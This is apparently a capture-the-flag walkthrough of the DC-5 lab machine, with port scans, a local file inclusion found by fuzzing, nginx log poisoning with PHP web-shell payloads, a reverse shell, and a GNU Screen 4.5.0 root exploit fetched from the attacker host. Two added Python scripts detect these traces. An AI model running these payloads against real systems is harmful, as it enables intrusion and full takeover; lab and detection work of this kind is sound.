DC-5
Host discovery and port scanning

Probe for live hosts; 192.168.75.175 is the target:

nmap -sP 192.168.75.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:27 CST
Nmap scan report for 192.168.75.1
Host is up (0.00022s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00018s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.175
Host is up (0.00016s latency).
MAC Address: 00:0C:29:BF:7F:5F (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:FE:CA:7A (VMware)
Nmap scan report for 192.168.75.151
Host is up.

Scan all open ports on the target:

nmap -sT --min-rate 10000 -p- 192.168.75.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:28 CST
Nmap scan report for 192.168.75.175
Host is up (0.00040s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
57203/tcp open unknown
MAC Address: 00:0C:29:BF:7F:5F (VMware)

Scan service versions and the OS version:

nmap -sV -sT -O -p80,111,57203 192.168.75.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:30 CST
Nmap scan report for 192.168.75.175
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
57203/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BF:7F:5F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

Vulnerability scan with the NSE vuln scripts:

nmap --script=vuln -p 80,111,57203 192.168.75.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:33 CST
Nmap scan report for 192.168.75.175
Host is up (0.00052s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.175
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.75.175:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind
57203/tcp open unknown
MAC Address: 00:0C:29:BF:7F:5F (VMware)

Nothing of substance here, so as usual we start with port 80.

Web penetration

Visit the home page.

Directory scan; nothing worth paying attention to:

dirsearch -u 192.168.75.175 -x 403
[13:40:35] Starting:
[13:40:56] 200 - 4KB - /contact.php
[13:40:56] 301 - 184B - /css -> http://192.168.75.175/css/
[13:41:00] 200 - 6KB - /faq.php
[13:41:01] 200 - 17B - /footer.php
[13:41:03] 301 - 184B - /images -> http://192.168.75.175/images/
[13:41:25] 200 - 852B - /thankyou.php

Now look at the hint on the official site: "This particular entry point may be hard to identify, but it does exist. You need to look for something unusual (something that changes when the page is refreshed)." We can notice that every time we submit the form, the year shown in the footer is different, so the entry point probably lives in the footer.

Visiting /footer.php and refreshing, the year keeps changing there too, so thankyou.php includes footer.php, and there is probably a parameter that controls which file gets included. Use wfuzz to brute-force the parameter name:

# Try to include /etc/passwd
wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt --hh 851 'http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd
Total requests: 3024
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001053: 200 70 L 104 W 2319 Ch "file"

The fuzzer turns up the parameter file, which is probably the one used to include files, and /etc/passwd is included successfully. Since there is no login page, including /etc/passwd alone gets us nothing; following the usual CTF line of thought, we try including a log file instead:
/thankyou.php?file=/var/log/nginx/access.log
Included successfully!

After some attempts, inserting PHP code through the User-Agent did not work. In the end we can put the PHP code in the file parameter itself so that the include fails and the statement is left behind in error.log (from here on the target IP changes to 192.168.75.176, because the earlier messing around broke the previous VM):
http://192.168.75.176/thankyou.php?file=<?php system($_POST['a']); ?>
Include error.log; as long as it contains <?php @eval($_POST['b']); ?> we are done:

2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning: include(<?php @eval($_POST['b']); ?>): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
PHP message: PHP Warning: include(): Failed opening '<?php @eval($_POST['b']); ?>' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.75.1, server: _, request: "GET /thankyou.php?file= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.75.176", referrer: "http://192.168.75.176/thankyou.ph"

Connect with AntSword (the password is b, or whatever your POST parameter is named), then open a terminal in AntSword and spawn a reverse shell.
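The file-include and log-poisoning chain above leaves clear traces in both nginx logs: path-like values in the file parameter, PHP tags in the User-Agent, and a failed include() that writes a PHP tag into error.log. As an added example (not part of the original write-up), this Python scanner flags those patterns; the sample log lines are constructed, modelled on the entries seen on this box.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (not copied from the target): four access-log entries
# and one error-log entry of the kind the failed include() produces.
SAMPLE_LINES = [
    '192.168.75.1 - - [03/Nov/2024:04:30:01 +0000] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 851 "-" "Mozilla/5.0"',
    '192.168.75.1 - - [03/Nov/2024:04:31:10 +0000] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 2319 "-" "Mozilla/5.0"',
    '192.168.75.1 - - [03/Nov/2024:04:32:44 +0000] "GET /thankyou.php?file=/var/log/nginx/access.log HTTP/1.1" 200 40210 "-" "Mozilla/5.0"',
    '192.168.75.1 - - [03/Nov/2024:04:33:02 +0000] "GET /index.php HTTP/1.1" 200 4021 "-" "<?php system($_GET[\'c\']); ?>"',
    '2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning: include(<?php @eval($_POST[\'b\']); ?>): failed to open stream" while reading response header from upstream, client: 192.168.75.1, request: "GET /thankyou.php?file=%3C%3Fphp HTTP/1.1"',
]

# nginx "combined" access-log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d+ \d+ "[^"]*" "(?P<ua>[^"]*)"'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
TRAVERSAL = re.compile(r"(^/|\.\./|/etc/|/var/log/|/proc/self/)", re.I)


def classify(line):
    """Return the reasons a single log line looks like LFI or log poisoning ([] if clean)."""
    reasons = []
    m = ACCESS_RE.match(line)
    if m:
        target = unquote(m.group("target"))  # decode %2e%2e%2f style encoding first
        for name, values in parse_qs(target and urlsplit(target).query).items():
            for v in values:
                if TRAVERSAL.search(v):
                    reasons.append(f"path-like value in parameter {name}: {v}")
                if PHP_TAG.search(v):
                    reasons.append(f"PHP tag in parameter {name}")
        if PHP_TAG.search(unquote(m.group("ua"))):
            reasons.append("PHP tag in User-Agent (log poisoning attempt)")
    elif "[error]" in line and "include(" in line and PHP_TAG.search(line):
        reasons.append("PHP tag written into error.log via failed include()")
    return reasons


def scan(lines):
    """Map the index of each suspicious line to its reasons; clean lines are omitted."""
    findings = {}
    for i, line in enumerate(lines):
        reasons = classify(line)
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LINES).items():
        print(i, "; ".join(reasons))
```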
Privilege escalation

Check who we are:

(www-data:/var/www) $ whoami
www-data
(www-data:/var/www) $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(www-data:/var/www) $ uname -a
Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux

Look for sensitive files (SUID binaries):

(www-data:/var/www) $ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

We notice screen-4.5.0. Search for whether screen 4.5.0 has a known privilege escalation vulnerability:

searchsploit screen 4.5.0
---------------------------------------------------- | ---------------------
Exploit Title                                        | Path
---------------------------------------------------- | ---------------------
GNU Screen 4.5.0 - Local Privilege Escalation        | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)  | linux/local/41152.txt
---------------------------------------------------- | ---------------------

Download linux/local/41154.sh, transfer it to the target and run the script:

$ wget http://192.168.75.151/41154.sh
converted 'http://192.168.75.151/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.75.151/41154.sh' (UTF-8)
--2024-11-03 05:11:00-- http://192.168.75.151/41154.sh
Connecting to 192.168.75.151:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [application/x-sh]
Saving to: '41154.sh'
41154.sh 100%[=====================>] 1.12K --.-KB/s in 0s
2024-11-03 05:11:00 (8.86 MB/s) - '41154.sh' saved [1149/1149]

$ chmod u+x 41154.sh

$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoiam
whoiam
sh: 2: whoiam: not found
# whoami
whoami
root

Privilege escalation succeeded; read the flag file:

# cat thisistheflag.txt
cat thisistheflag.txt
[ASCII-art banner from the flag file; spacing lost in extraction]
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
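Two host-side artefacts of the screen 4.5.0 escalation used above are the oddly named SUID binary and the /etc/ld.so.preload file the exploit creates. As an added example (not part of the original write-up), this Python audit walks for setuid files, diffs them against an assumed baseline, and lists anything ld.so.preload would inject; the baseline set, the sample SUID list and the preload library path are constructed for illustration.

```python
import os
import re
import stat

# Constructed sample data: a subset of the SUID list this box returned, and an
# /etc/ld.so.preload of the kind the exploit writes (library path is made up).
SAMPLE_SUID = [
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/screen-4.5.0", "/usr/bin/gpasswd",
    "/usr/bin/passwd", "/usr/lib/openssh/ssh-keysign", "/usr/sbin/exim4", "/sbin/mount.nfs",
]
SAMPLE_PRELOAD = "/tmp/libexample.so\n"

# Hypothetical baseline of SUID binaries expected on a stock Debian 8 host of this
# kind; in practice generate it from a known-good image of your own build.
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/gpasswd", "/usr/bin/passwd",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/at", "/usr/bin/procmail",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/sbin/exim4", "/sbin/mount.nfs",
}
VERSIONED = re.compile(r"-\d+(\.\d+)+$")  # e.g. screen-4.5.0: not how packages name binaries
SYSTEM_LIB_DIRS = ("/lib", "/usr/lib")


def find_suid(root="/"):
    """Live equivalent of `find / -perm -u=s -type f`: regular files with the setuid bit."""
    hits = []
    for d, _, files in os.walk(root):
        for f in files:
            p = os.path.join(d, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(p)
    return hits


def audit_suid(paths, baseline=BASELINE):
    """Return (path, reason) for every SUID binary that is not in the baseline."""
    findings = []
    for p in paths:
        if p not in baseline:
            reason = "not in baseline"
            if VERSIONED.search(p):
                reason += "; versioned filename suggests a hand-installed build"
            findings.append((p, reason))
    return findings


def audit_preload(content):
    """Return (library, verdict) for each entry ld.so.preload would inject; a clean host has none."""
    libs = [l.strip() for l in content.splitlines() if l.strip() and not l.lstrip().startswith("#")]
    return [(l, "outside system library dirs" if not l.startswith(SYSTEM_LIB_DIRS) else "present; verify package") for l in libs]
```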